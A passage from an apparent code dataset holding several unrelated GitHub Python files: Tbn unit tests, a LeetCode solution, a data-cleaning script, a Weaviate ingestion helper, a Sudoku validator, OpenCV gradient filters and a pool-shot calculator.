Monomer\nfrom source.domain import Domain\n\n\nclass TestTbn(unittest.TestCase):\n def setUp(self):\n self.x = Monomer.from_string(\"x0 x1\", \"X\")\n self.y = Monomer.from_string(\"2(y0) 1(y1) 3(y2)\", \"Y\")\n\n self.Tbn_1x = 
Tbn({self.x: 1})\n self.Tbn_1y = Tbn({self.y: 1})\n self.Tbn_1x_1y = Tbn({self.y: 1, self.x: 1})\n self.Tbn_2x_3y = Tbn({self.y: 3, self.x: 2})\n self.Tbn_infx_2y = Tbn({self.x: infinity, self.y: 2})\n self.Tbn_2x_infy = Tbn({self.y: infinity, self.x: 2})\n self.Tbn_1x_infy = Tbn({self.y: infinity, self.x: 1})\n\n def test_init(self):\n for quantity in [0, -1, -2, 'a', '^', '-inf']:\n with self.subTest(\"Do not allow nonpositive monomer quantities\", quantity=quantity):\n with self.assertRaises(AssertionError):\n Tbn({self.x: 2, self.y: quantity})\n\n with self.subTest(\"allow infinite monomer quantities\"):\n Tbn({self.x: infinity, self.y: 2})\n Tbn({self.x: 2, self.y: infinity})\n\n def test_str(self):\n tests = [\n (self.Tbn_1x, \"{X}\"),\n (self.Tbn_1y, \"{Y}\"),\n (self.Tbn_1x_1y, \"{X, Y}\"),\n (self.Tbn_2x_3y, \"{2(X), 3(Y)}\"),\n (self.Tbn_infx_2y, \"{inf(X), 2(Y)}\"),\n (self.Tbn_2x_infy, \"{2(X), inf(Y)}\"),\n (self.Tbn_1x_infy, \"{X, inf(Y)}\"),\n ]\n for tbn, Tbn_as_string in tests:\n with self.subTest(Tbn_as_string=Tbn_as_string):\n self.assertEqual(Tbn_as_string, str(tbn))\n\n def test_lt(self):\n self.assertTrue(self.Tbn_2x_3y < self.Tbn_1x_1y)\n self.assertTrue(self.Tbn_1x_1y < self.Tbn_1x)\n self.assertTrue(self.Tbn_1x < self.Tbn_1y)\n self.assertTrue(self.Tbn_2x_infy < self.Tbn_2x_3y)\n self.assertTrue(self.Tbn_2x_3y < self.Tbn_1x_infy)\n self.assertTrue(self.Tbn_infx_2y < self.Tbn_1x_infy)\n\n self.assertFalse(self.Tbn_1x_1y < self.Tbn_2x_3y)\n self.assertFalse(self.Tbn_1x < self.Tbn_1x_1y)\n self.assertFalse(self.Tbn_1y < self.Tbn_1x)\n self.assertFalse(self.Tbn_2x_3y < self.Tbn_2x_infy)\n self.assertFalse(self.Tbn_1x_infy < self.Tbn_2x_3y)\n self.assertFalse(self.Tbn_1x_infy < self.Tbn_infx_2y)\n\n def test_eq(self):\n self.assertEqual(Tbn({Monomer.from_string(\"a\"): 1}), Tbn({Monomer.from_string(\"a\"): 1}))\n self.assertEqual(Tbn({Monomer.from_string(\"a\"): infinity}), Tbn({Monomer.from_string(\"a\"): infinity}))\n self.assertNotEqual(Tbn({Monomer.from_string(\"a\"): 1}), Tbn({Monomer.from_string(\"a\"): 2}))\n self.assertNotEqual(Tbn({Monomer.from_string(\"a\"): 1}), Tbn({Monomer.from_string(\"b\"): 1}))\n self.assertNotEqual(Tbn({Monomer.from_string(\"a\"): 1}), Tbn({Monomer.from_string(\"a\"): infinity}))\n\n def test_from_string(self):\n with self.subTest(\"single monomer example\"):\n self.assertEqual(Tbn({Monomer.from_string(\"a\"): 1}), Tbn.from_string(\"a\"))\n\n with self.subTest(\"single monomer type, multiple monomer example\"):\n self.assertEqual(Tbn({Monomer.from_string(\"a\"): 2}), Tbn.from_string(\"2[a]\"))\n\n with self.subTest(\"testing from_string with example from stablegen.net/help\"):\n example_text = \\\n \"\"\"\n a*:b1 b*\n a b:b2 >m1\n a* >m2\n b*\n \"\"\"\n example_tbn = Tbn({\n Monomer.from_string(\"a* b*\"): 1,\n Monomer.from_string(\"a b\", \"m1\"): 1,\n Monomer.from_string(\"a*\", \"m2\"): 1,\n Monomer.from_string(\"b*\"): 1,\n })\n self.assertEqual(example_tbn, Tbn.from_string(example_text))\n\n with self.subTest(\"testing from_string with multisets\"):\n multiset_text = \\\n \"\"\"\n 2[ 3(a*) a b ]\n [ c ]\n 5[ a a:favorite_a b >bob ]\n 7[ b a b b ]\n b a b b b*\n \"\"\"\n multiset_tbn = Tbn({\n Monomer.from_string(\"a* a* a* a b\"): 2,\n Monomer.from_string(\"c\"): 1,\n Monomer.from_string(\"2(a) b\", \"bob\"): 5,\n Monomer.from_string(\"3(b) a\"): 7,\n Monomer.from_string(\"b* 3(b) a\"): 1,\n })\n self.assertEqual(multiset_tbn, Tbn.from_string(multiset_text))\n\n with self.subTest(\"testing from_string with excess monomers\"):\n 
multiset_text = \\\n \"\"\"\n 2[ 3(a*) a b ]\n inf[ c ]\n 5[ a a b >bob ]\n inf[ b a b b ]\n b a b b b*\n \"\"\"\n multiset_tbn = Tbn({\n Monomer.from_string(\"a* a* a* a b\"): 2,\n Monomer.from_string(\"c\"): infinity,\n Monomer.from_string(\"2(a) b\", \"bob\"): 5,\n Monomer.from_string(\"3(b) a\"): infinity,\n Monomer.from_string(\"b* 3(b) a\"): 1,\n })\n self.assertEqual(multiset_tbn, Tbn.from_string(multiset_text))\n\n def test_monomer_types(self):\n tests = [\n ({}, []),\n ({self.x: 3}, [self.x]),\n ({self.y: 5}, [self.y]),\n ({self.x: 5, self.y: 2}, [self.x, self.y]),\n ({self.x: infinity, self.y: infinity}, [self.x, self.y]),\n ]\n for monomer_multiset, monomer_types in tests:\n tbn = Tbn(monomer_multiset)\n with self.subTest(\"ordinary monomer type iterator\", tbn=tbn):\n self.assertEqual(monomer_types, list(tbn.monomer_types()))\n flatten_tests = [\n ({}, []),\n ({self.x: 3}, [self.x]),\n ({self.y: 5}, [self.y]),\n ({self.x: 5, self.y: 2}, [self.x, self.y]),\n ]\n for monomer_multiset, monomer_types in flatten_tests:\n tbn = Tbn(monomer_multiset)\n with self.subTest(\"monomer type iterator with flatten\", tbn=tbn):\n flattened_list = list(tbn.monomer_types(flatten=True))\n for monomer_type in monomer_types:\n self.assertEqual(tbn.count(monomer_type), flattened_list.count(monomer_type))\n\n def test_limiting_domain_types(self):\n tests = [\n ({}, []),\n ({self.x: 3}, [Domain(\"x0*\"), Domain(\"x1*\")]),\n ({self.y: 5}, [Domain(\"y0*\"), Domain(\"y1*\"), Domain(\"y2*\")]),\n ({self.x: 5, self.y: 2}, [Domain(\"x0*\"), Domain(\"x1*\"), Domain(\"y0*\"), Domain(\"y1*\"), Domain(\"y2*\")]),\n ({Monomer.from_string(\"a*\"): 2, Monomer.from_string(\"a\"): 1}, [Domain(\"a\")]),\n ({Monomer.from_string(\"3(a*)\"): 1, Monomer.from_string(\"a\"): 2}, [Domain(\"a\")]),\n ({Monomer.from_string(\"a*\"): 1, Monomer.from_string(\"a\"): 2}, [Domain(\"a*\")]),\n ({Monomer.from_string(\"2(a*)\"): 1, Monomer.from_string(\"a\"): 2}, [Domain(\"a*\")]),\n ({Monomer.from_string(\"2(a*)\"): 1, Monomer.from_string(\"a\"): infinity}, [Domain(\"a*\")]),\n ({Monomer.from_string(\"2(a*)\"): infinity, Monomer.from_string(\"a\"): 2}, [Domain(\"a\")]),\n ]\n for monomer_multiset, expected_limiting_domain_types in tests:\n with self.subTest(\"limiting domain types\", tbn=str(Tbn(monomer_multiset))):\n limiting_domain_types = list(Tbn(monomer_multiset).limiting_domain_types())\n self.assertEqual(expected_limiting_domain_types, limiting_domain_types)\n\n with self.subTest(\"cannot have conflicting excess domain types\"):\n conflicting_excess_tbn = Tbn(\n {Monomer.from_string(\"a\"): infinity, Monomer.from_string(\"a*\"): infinity}\n )\n with self.assertRaises(AssertionError):\n list(conflicting_excess_tbn.limiting_domain_types())\n\n with self.subTest(\"test equal count tie-breaking filter\"):\n monomer_multiset = {\n Monomer.from_string(\"2(a)\"): 1,\n Monomer.from_string(\"a*\"): 2,\n Monomer.from_string(\"b*\"): 1\n }\n limiting_domain_types = list(Tbn(monomer_multiset).limiting_domain_types(filter_ties=True))\n self.assertEqual([Domain(\"b\")], limiting_domain_types)\n\n def test_limiting_monomer_types(self):\n test_tbn = Tbn({\n Monomer.from_string(\"a b c e\"): infinity,\n Monomer.from_string(\"a d*\"): 1,\n Monomer.from_string(\"d*\"): infinity,\n Monomer.from_string(\"a*\"): 2, # a* is limiting in this example\n Monomer.from_string(\"a d e*\"): 3, # both d and e* are limiting in this example\n Monomer.from_string(\"f\"): 1,\n Monomer.from_string(\"f*\"): 1, # f* is chosen as limiting to break the tie (favors 
stars)\n })\n limiting_monomer_types = sorted([\n Monomer.from_string(\"a d e*\"),\n Monomer.from_string(\"a*\"),\n Monomer.from_string(\"f*\")\n ])\n self.assertEqual(limiting_monomer_types, list(test_tbn.limiting_monomer_types()))\n\n def test_count(self):\n tests = [\n (self.Tbn_1x, self.x, 1),\n (self.Tbn_1x, self.y, 0),\n (self.Tbn_1y, self.x, 0),\n (self.Tbn_1y, self.y, 1),\n (self.Tbn_1x_1y, self.x, 1),\n (self.Tbn_1x_1y, self.y, 1),\n (self.Tbn_2x_3y, self.x, 2),\n (self.Tbn_2x_3y, self.y, 3),\n (self.Tbn_2x_infy, self.x, 2),\n (self.Tbn_2x_infy, self.y, infinity),\n (self.Tbn_infx_2y, self.x, infinity),\n (self.Tbn_infx_2y, self.y, 2),\n ]\n for tbn, monomer, count in tests:\n with self.subTest(\"correct monomer counts from tbn\", tbn=str(tbn), monomer=str(monomer), count=count):\n self.assertEqual(count, tbn.count(monomer))\n\n def test_subtract(self):\n tests = [\n (self.Tbn_1x, self.Tbn_1x_1y - self.Tbn_1y),\n (self.Tbn_1y, self.Tbn_2x_3y - self.Tbn_1x - self.Tbn_1x - self.Tbn_1y - self.Tbn_1y),\n (self.Tbn_2x_infy, self.Tbn_2x_infy - self.Tbn_1y),\n ]\n for first, second in tests:\n with self.subTest(\"subtracton subtest\", first=str(first), second=str(second)):\n self.assertEqual(first, second)\n\n with self.subTest(\"do not allow subtraction unless it is a subset of the first\"):\n with self.assertRaises(AssertionError):\n self.Tbn_1x - self.Tbn_1y\n with self.assertRaises(AssertionError):\n self.Tbn_1x_1y - self.Tbn_2x_3y\n","repo_name":"drhaley/stable_tbn","sub_path":"tests/test_tbn.py","file_name":"test_tbn.py","file_ext":"py","file_size_in_byte":10614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"74080276591","text":"class Solution:\n def intersection(self, nums: List[List[int]]) -> List[int]:\n minimum = max(nums[0])\n for lists in nums:\n maximum = max(lists)\n if maximum < minimum:\n minimum = maximum\n returnList = []\n i = 0\n while (i < minimum) or ([] not in nums):\n inAll = True\n for item in nums:\n if i not in item:\n inAll = False\n break\n else:\n item.remove(i)\n if inAll == True:\n returnList.append(i)\n i+=1\n return returnList\n","repo_name":"Svehini/leetcode","sub_path":"IntersectionOfMultipleArrays.py","file_name":"IntersectionOfMultipleArrays.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"4405863220","text":"from functions import *\n\nimport os\n\n# creating the dictionary containing the info of the project\nresult_JSON_file = {'file name': 'report for the coding assignment',\n 'Start date': 'Jan. 
21, 2023',\n 'Start time': '12 PM',\n 'End date': 'Jan, 21, 2023',\n 'End time': '4 PM'}\n\n\n# getting the location of the source file\ncur_path = os.getcwd()\nfile_path = os.path.join(cur_path, 'input/data.txt')\n\n# to generate the dataset containing the information for naming columns and assigning data types\ndf_info = data_maker(data_generator(file_path, line_nums=[6, 21]))\ndf_info = pd.DataFrame(df_info)\n\n# to generate the dataset containing the data with time samples as the columns' name\ndf = data_maker(data_generator(file_path, line_nums=list(range(27, 57))))\ndf = pd.DataFrame(df)\n\n# naming the columns of the dataset based on row 7\ndf = column_namer(df, df_info)\n\n# removing the datatype first letter from the naming column\ndf = column_renamer(df)\n\n# applying the datatypes based on row 22\ndf = apply_data_type(df, df_info)\n\n# creating a dictionary including the mean of the column (skipping the boolean columns)\nmean_dict = mean_calculator(df)\n\n# re-formatting the float32 to float64 before generating the JSON file (float32 is not supported by JSON)\nmean_dict = data_reformater(mean_dict)\n\n# combining the dict of the mean values with the dict of result_JSON_file\nresult_JSON_file = dict_combiner(result_JSON_file, mean_dict)\n\n# writing the JSON file -- output file name: results-Erfan.json\njson_writer(result_JSON_file)\n\n# converting the dataframe as CSV file -- output file name: dataframe.csv\ncsv_writer(df)\n\nprint('Code executed successfully!')\n\n\n\n\n\n\n\n","repo_name":"erfanbyt/data-cleaning-project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"73446205232","text":"import os\nfrom dotenv import load_dotenv\nimport weaviate\nfrom datetime import datetime\nfrom utilities import weaviate_helper as helper\n\n# Load environment variables\nload_dotenv()\n\n# Shape the connection string\nconnection_string = f\"https://{os.environ.get('WEAVIATE_URL')}\"\n\n# Add the auth config\nauth_config = weaviate.AuthApiKey(api_key=os.environ.get('WEAVIATE_API_KEY'))\n\nclient = weaviate.Client(url=connection_string, auth_client_secret=auth_config, additional_headers={\n \"X-OpenAI-Api-Key\": os.environ.get('OPENAI_API_KEY'),\n})\n\n\n# function to add documents to Weaviate\ndef add_to_weaviate(schema, table, data):\n def create_custom_class(class_name, schema):\n properties = [\n {\n \"name\": prop_name,\n \"dataType\": [data_type],\n }\n for prop_name, data_type in schema.items()\n ]\n\n print(properties)\n helper.convert_data_types(properties)\n\n class_obj = {\n \"class\": class_name,\n \"properties\": properties,\n \"vectorizer\": \"text2vec-openai\",\n \"moduleConfig\": {\n \"text2vec-openai\": {\n \"vectorizeClassName\": False,\n \"model\": \"ada\",\n \"modelVersion\": \"002\",\n \"type\": \"text\"\n }\n }\n }\n return class_obj\n\n class_obj = create_custom_class(table, schema)\n client.schema.create_class(class_obj)\n\n with client.batch() as batch:\n for item in data:\n # Check if the item is a dictionary\n if isinstance(item, dict):\n for key, value in item.items():\n # Check if the value is a datetime object\n if isinstance(value, datetime):\n # Convert the datetime object to a string\n item[key] = value.isoformat()\n \n batch.add_data_object(\n class_name=table,\n data_object=item\n )\n\n return f\"✅ {len(data)} objects added to 
Weaviate\"\n","repo_name":"hasura/vectorize-postgresql-data-for-weaviate","sub_path":"python/weaviate_config.py","file_name":"weaviate_config.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"15002257416","text":"# -*- coding: utf-8 -*-\n# @Author : mohailang (1198534595@qq.com)\n\n\nclass Solution:\n def isValidSudoku(self, board):\n \"\"\"\n :type board: List[List[str]]\n :rtype: bool\n \"\"\"\n # 类似于数组查重的问题都可以用边遍历边查找的方法来解决\n row = [set([]) for i in range(9)]\n col = [set([]) for i in range(9)]\n grid = [set([]) for i in range(9)]\n\n for r in range(9):\n for c in range(9):\n if board[r][c] == \".\":\n continue\n if board[r][c] in row[r]:\n return False\n if board[r][c] in col[c]:\n return False\n\n # 计算子九宫格的位置\n g = r//3*3 + c//3\n if board[r][c] in grid[g]:\n return False\n # 把相应的元素存储,以便接下来的遍历查找是否有重复\n grid[g].add(board[r][c])\n row[r].add(board[r][c])\n col[c].add(board[r][c])\n return True\n # 在这里其实并不需要用到set,直接用list就可以了,因为在遍历的时候如果有相同的元素就直接返回了,并不会加入到list中\n","repo_name":"WaveMo/Language","sub_path":"Python3/初级算法/数组/有效的数独.py","file_name":"有效的数独.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"25525881642","text":"import numpy as np\nimport cv2\nimport pickle\n\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nfrom common import *\n\n\nthreshold = {'x':(20, 100), 'y':(20, 100) ,'m':(30, 100) , 'd':(0.7, 1.3)}\n\ndef canny_test():\n #fig = plt.figure()\n # Read in the image and convert to grayscale\n image = mpimg.imread(img_file)\n gray = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\n\n if False:\n # Define a kernel size for Gaussian smoothing / blurring\n # Note: this step is optional as cv2.Canny() applies a 5x5 Gaussian internally\n kernel_size = 7#15 #has to be odd\n blur_gray = cv2.GaussianBlur(gray,(kernel_size, kernel_size), 0)\n else:\n blur_gray = gray\n\n # Define parameters for Canny and run it\n # NOTE: if you try running this code you might want to change these!\n low_threshold = 50#50\n high_threshold = 100#110\n edges = cv2.Canny(blur_gray, low_threshold, high_threshold)\n f0 = plt.figure(0)\n plt.imshow(edges, cmap='Greys_r')\n plt.title(\"canny\")\n f0.show()\n # Display the image\n #fig1 = plt.figure(1)\n #plt.imshow(gray, cmap='Greys_r')\n\n #fig2 = plt.figure(2)\n #plt.imshow(blur_gray, cmap='Greys_r')\n #fig1.show()\n #plt.show()\n if False:\n fig3 = plt.figure(3)\n for i in range(1,50,5):\n low_threshold = i # 50\n high_threshold = 100 # 110\n edges = cv2.Canny(blur_gray, low_threshold, high_threshold)\n plt.imshow(edges, cmap='Greys_r')\n #fig2.show()\n plt.show()\n plt.show()\n\ndef sobel(gray, x, y, thresh_min = 20, thresh_max = 100):\n sobel = cv2.Sobel(gray, cv2.CV_64F, x, y)\n abs_sobel = np.absolute(sobel)\n scaled_sobel = np.uint8(255 * abs_sobel / np.max(abs_sobel))\n sbinary = np.zeros_like(scaled_sobel)\n sbinary[(scaled_sobel >= thresh_min) & (scaled_sobel <= thresh_max)] = 1\n return scaled_sobel, sbinary\n\ndef sobel_filter():\n image = mpimg.imread(img_file)\n gray = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\n\n scaled_sobel, sbinary = sobel(gray, 0, 1)\n f0 = plt.figure(0)\n plt.imshow(scaled_sobel, cmap='gray')\n plt.title(\"scaled_sobel\")\n f0.show()\n f1 =plt.figure(1)\n plt.imshow(sbinary, cmap='gray')\n plt.title(\"sbinary\")\n f1.show()\n\n\ndef abs_sobel_thresh(img, orient='x', sobel_kernel=3, thresh=threshold['x']):\n 
orientation ={'x':(1, 0), 'y':(0, 1)}\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n sobel = cv2.Sobel(gray, cv2.CV_64F,*orientation[orient], ksize=sobel_kernel)\n abs_sobel = np.absolute(sobel)\n scaled_sobel = np.uint8(255 * abs_sobel / np.max(abs_sobel))\n\n grad_binary = np.zeros_like(scaled_sobel)\n grad_binary[(scaled_sobel >= thresh[0]) & (scaled_sobel <= thresh[1])] = 1\n # Calculate directional gradient\n # Apply threshold\n return grad_binary\n\ndef mag_thresh(img, sobel_kernel=3, mag_thresh=threshold['m']):\n # Apply the following steps to img\n # 1) Convert to grayscale\n # 2) Take the gradient in x and y separately\n # 3) Calculate the magnitude\n # 4) Scale to 8-bit (0 - 255) and convert to type = np.uint8\n # 5) Create a binary mask where mag thresholds are met\n # 6) Return this mask as your binary_output image\n #binary_output = np.copy(img) # Remove this line\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n sobelx = cv2.Sobel(gray, cv2.CV_64F, 1, 0,ksize=sobel_kernel)\n sobely = cv2.Sobel(gray, cv2.CV_64F, 0, 1,ksize=sobel_kernel)\n #mag, ang = cv2.cartToPolar(sobelx, sobely)\n sobel_m = np.sqrt(np.square(sobelx)+np.square(sobely))\n sobelm = np.uint8(255 * sobel_m / np.max(sobel_m))\n binary_output = np.zeros_like(sobelm)\n binary_output[(sobelm >= mag_thresh[0]) & (sobelm <= mag_thresh[1])] = 1\n return binary_output\n\n\n# Define a function that applies Sobel x and y,\n# then computes the direction of the gradient\n# and applies a threshold.\ndef dir_threshold(img, sobel_kernel=3, thresh=threshold['d']):\n # Apply the following steps to img\n # 1) Convert to grayscale\n # 2) Take the gradient in x and y separately\n # 3) Take the absolute value of the x and y gradients\n # 4) Use np.arctan2(abs_sobely, abs_sobelx) to calculate the direction of the gradient\n # 5) Create a binary mask where direction thresholds are met\n # 6) Return this mask as your binary_output image\n #binary_output = np.copy(img) # Remove this line\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n abs_sobelx = np.absolute(cv2.Sobel(gray, cv2.CV_64F, 1, 0,ksize=sobel_kernel))\n abs_sobely = np.absolute(cv2.Sobel(gray, cv2.CV_64F, 0, 1,ksize=sobel_kernel))\n\n sobel_slope = np.arctan2(abs_sobely, abs_sobelx)\n\n binary_output = np.zeros_like(sobel_slope)\n binary_output[(sobel_slope >= thresh[0]) & (sobel_slope <= thresh[1])] = 1\n\n return binary_output\n\n\n\ndef main1():\n #canny_test()\n #sobel_filter()\n fig0 =plt.figure(0)\n B = mag_thresh(image, sobel_kernel=3, mag_thresh=(30, 100))\n plt.imshow(B, cmap='gray')\n fig1 = plt.figure(1)\n B = mag_thresh(image, sobel_kernel=9, mag_thresh=(30, 100))\n plt.imshow(B, cmap='gray')\n fig2 = plt.figure(2)\n B = mag_thresh(image, sobel_kernel=13, mag_thresh=(30, 100))\n plt.imshow(B, cmap='gray')\n\n fig3 = plt.figure(3)\n B = dir_threshold(image, sobel_kernel=15, thresh=(0.7, 1.3))\n plt.imshow(B, cmap='gray')\n\n plt.show()\n #input(\"Press Enter to continue...\")\n\ndef main():\n imgs =[[\"gradx\", \"grady\", \"mag_binary\"], [\"dir_binary\", \"combined\", \"combined1\"]]\n # Choose a Sobel kernel size\n ksize = 15 # Choose a larger odd number to smooth gradient measurements\n\n # Apply each of the thresholding functions\n gradx = abs_sobel_thresh(image, orient='x', sobel_kernel=ksize, thresh=(20, 100))\n grady = abs_sobel_thresh(image, orient='y', sobel_kernel=ksize, thresh=(20, 100))\n mag_binary = mag_thresh(image, sobel_kernel=ksize, mag_thresh=(30, 100))\n dir_binary = dir_threshold(image, sobel_kernel=ksize, thresh=(.7, 1.3))\n combined = 
np.zeros_like(dir_binary)\n    combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1))] = 1\n    combined1 = np.zeros_like(dir_binary)\n    combined1[((gradx == 1) & (dir_binary == 1))] = 1\n\n    col_no = 3\n    raw_no = 2\n    f, ax = plt.subplots(raw_no, col_no, figsize=(24, 9))\n    f.tight_layout()\n    for c in range(0,col_no):\n        for r in range(0, raw_no):\n            #plt.imshow(exec(im), cmap='gray')\n            ax[r][c].imshow(eval(imgs[r][c]), cmap='gray')\n            ax[r][c].set_title(imgs[r][c], fontsize=50)\n    plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)\n    plt.show()\n\n# -------------------------------------\n# Entry point for the script\n# -------------------------------------\nif __name__ == '__main__':\n    img_file = 'test_images/signs_vehicles_xygrad.png'\n    image = mpimg.imread(img_file)\n\n    main()\n    pass\n","repo_name":"mhhm2005eg/CarND-Advanced-Lane-Lines","sub_path":"gradient.py","file_name":"gradient.py","file_ext":"py","file_size_in_byte":6890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"3681502546","text":"from math import sin, cos, atan, pi\n\ndef ball_in_path(start_y, start_x, end_y, end_x, radius):\n    a = end_y - start_y\n    b = start_x - end_x\n    c = (-start_x) * end_y + end_x * start_y\n    for ball_y, ball_x in balls:\n        if (round(ball_y, 4) == round(start_y, 4) and round(ball_x, 4) == round(start_x, 4)) or (round(ball_y, 4) == round(end_y, 4) and round(ball_x, 4) == round(end_x, 4)):\n            continue\n\n        if abs(a*ball_x + b*ball_y + c) / (a**2 + b**2) ** 0.5 < 2*radius and min(start_y, end_y) < ball_y < max(start_y, end_y) and min(start_x, end_x) < ball_x < max(start_x, end_x):\n            return True\n    return False\n\n\ndef cal_actan(dy, dx):\n    if dx > 0:\n        if dy > 0:\n            return atan(dy/dx) * 180 / pi\n        elif dy < 0:\n            return atan(dy / dx) * 180 / pi + 360\n        else:\n            return 0\n\n    elif dx < 0:\n        if dy > 0:\n            return atan(dy/dx) * 180 / pi + 180\n        elif dy < 0:\n            return atan(dy/dx) * 180 / pi + 180\n        else:\n            return 180\n\n    elif dx == 0:\n        if dy > 0:\n            return 90\n        elif dy < 0:\n            return 270\n\n\nw = 127 # half the width of the pool table\nh = 127 # height of the pool table\nholes = ((0, 0, 225), (0, w, 270), (0, 2*w, 315), (h, 0, 135), (h, w, 90), (h, 2*w, 45)) # coordinates and entry angles of the 6 pockets\n\nradius = 2.86 # ball radius\nwhite_y = 64 # cue ball y coordinate\nwhite_x = 64 # cue ball x coordinate\n\nballs = [(250, 5)] # coordinates of the target balls (x, y)\n\nangles_white_to_ball = [] # angle from the cue ball to each target ball (degrees)\nfor ball_x, ball_y in balls:\n    angles_white_to_ball.append(cal_actan(ball_y - white_y, ball_x - white_x))\nprint(\"Angle from the cue ball to each target ball:\", angles_white_to_ball)\nprint()\n\nangles_balls_to_holes = []\nsequence = []\nfor ball_num, ball_data in enumerate(balls):\n    ball_x = ball_data[0]\n    ball_y = ball_data[1]\n    ball_to_holes = []\n    for hole_num, hole_data in enumerate(holes):\n        hole_y = hole_data[0]\n        hole_x = hole_data[1]\n        ball_to_hole = cal_actan(hole_y - ball_y, hole_x - ball_x)\n        ball_to_holes.append(ball_to_hole)\n        abs_angle = abs(angles_white_to_ball[ball_num] - ball_to_hole)\n        sequence.append((min(abs_angle, 360 - abs_angle), ball_num, hole_num))\n    angles_balls_to_holes.append(ball_to_holes)\n\nprint(angles_balls_to_holes)\nprint(sequence)\nsequence.sort() # angle, ball index, pocket index\nprint(\"Priority order:\", sequence)\n\nfor dummy, ball_num, hole_num in sequence:\n    print(\"Selected target ball index:\", ball_num)\n    print(\"Selected pocket index:\", hole_num)\n    ball_to_hole = angles_balls_to_holes[ball_num][hole_num]\n    print(\"Angle to the selected pocket:\", ball_to_hole)\n    print(\"Correction value:\", ball_to_hole - holes[hole_num][2])\n    cal_angle = (ball_to_hole - holes[hole_num][2]) * 0.00 + ball_to_hole # angle the target ball will travel at; the 0.1 was chosen arbitrarily @@@@@@@@@@@@\n    print(\"Travel angle of the target ball accounting for the cushion:\", cal_angle)\n    print()\n\n    ball_x, ball_y = balls[ball_num]\n    hole_y, hole_x, dummy = holes[hole_num]\n    # check whether another ball sits in the target ball's path\n    if ball_in_path(ball_y, ball_x, hole_y, hole_x, radius):\n        continue\n\n    move_white_y = ball_y - 2 * radius * sin(cal_angle * pi / 180) # y coordinate the cue ball must reach\n    move_white_x = ball_x - 2 * radius * cos(cal_angle * pi / 180) # x coordinate the cue ball must reach\n    print(\"Coordinates the cue ball must reach:\", move_white_y, \",\", move_white_x)\n\n    shoot_angle = cal_actan(move_white_y - white_y, move_white_x - white_x) % (360) # angle at which to shoot the cue ball\n    print(\"Cue ball shot angle:\", shoot_angle)\n    print()\n\n    # check whether another ball sits in the cue ball's path\n    if ball_in_path(white_y, white_x, move_white_y, move_white_x, radius):\n        continue\n\n    distance_ball = ((hole_y - ball_y) ** 2 + (hole_x - ball_x) ** 2) ** 0.5\n    print(\"Distance the target ball must travel:\", distance_ball)\n    k = 9 # constant k = 2 * f / m, chosen arbitrarily @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n    need_target_v = k * distance_ball ** 0.5\n    print(\"Speed the target ball needs:\", need_target_v)\n    abs_delta = abs(shoot_angle - cal_angle)\n    print(\"Angle between the cue ball's direction and the target ball's direction:\", abs_delta)\n    need_white_v = need_target_v / cos(abs_delta * pi / 180)\n    print(\"Cue ball speed needed just before impact:\", need_white_v)\n    distance_white = ((white_y - move_white_y) ** 2 + (white_x - move_white_x) ** 2) ** 0.5\n    print(\"Distance the cue ball travels\", distance_white)\n    need_white_v0 = (need_white_v ** 2 + k * distance_white) ** 0.5\n    print(\"Initial speed of the cue ball:\", need_white_v0)\n    print()\n\n    print(\"Chosen cue ball angle: %f, power: %f\"%(shoot_angle, need_white_v0))\n    shoot_angle = ((360 - shoot_angle) + 90) % 360 # final angle\n    print(\"Angle to output: %f, force: %f\"%(shoot_angle, need_white_v0))\n    break\n\n\n# if no shot was possible at all\nelse:\n    print(\"Last resort\")","repo_name":"Sunghwan-DS/TIL","sub_path":"Python/SSAFY_pocketball_with_notes.py","file_name":"SSAFY_pocketball_with_notes.py","file_ext":"py","file_size_in_byte":5062,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"6090674684","text":"# -*- coding: utf-8 -*-\nimport argparse\nimport datetime\nimport logging\n\nimport dask.array as da\nimport fstpy\nimport numpy as np\nimport pandas as pd\n\nfrom ..plugin import Plugin, PluginParser\nfrom ..utils import (create_empty_result, final_results, get_list_of_forecast_hours, \n                     initializer, to_numpy, validate_list_of_nomvar, validate_list_of_times, \n                     validate_list_of_tuples_of_times, validate_nomvar)\nfrom ..configparsingutils import apply_lambda_to_list, convert_time_range, convert_time\n\nclass TimeIntervalMinMaxError(Exception):\n    pass\n\nclass TimeIntervalMinMax(Plugin):\n    \"\"\"Calculation of the minimum/maximum of a field within a specified time frame\n\n    :param df: Input dataframe\n    :type df: pd.DataFrame\n    :param nomvar: Target nomvar(s) for the computation of min max\n    :type nomvar: str or list of str\n    :param min: get the minimum, defaults to False\n    :type min: bool, optional\n    :param max: get the maximum, defaults to False\n    :type max: bool, optional\n    :param forecast_hour_range: List of forecast hour ranges, tuple of 2 values\n    :type forecast_hour_range: tuple(datetime.timedelta, datetime.timedelta) or list of tuple(datetime.timedelta, datetime.timedelta)\n    :param interval: List of the time intervals between inputs within each time range.\n    :type interval: datetime.timedelta or list of datetime.timedelta\n    :param step: List of the time steps between successive start times within each time range\n    :type step: datetime.timedelta or list of datetime.timedelta \n    :param nomvar_min: nomvar of min 
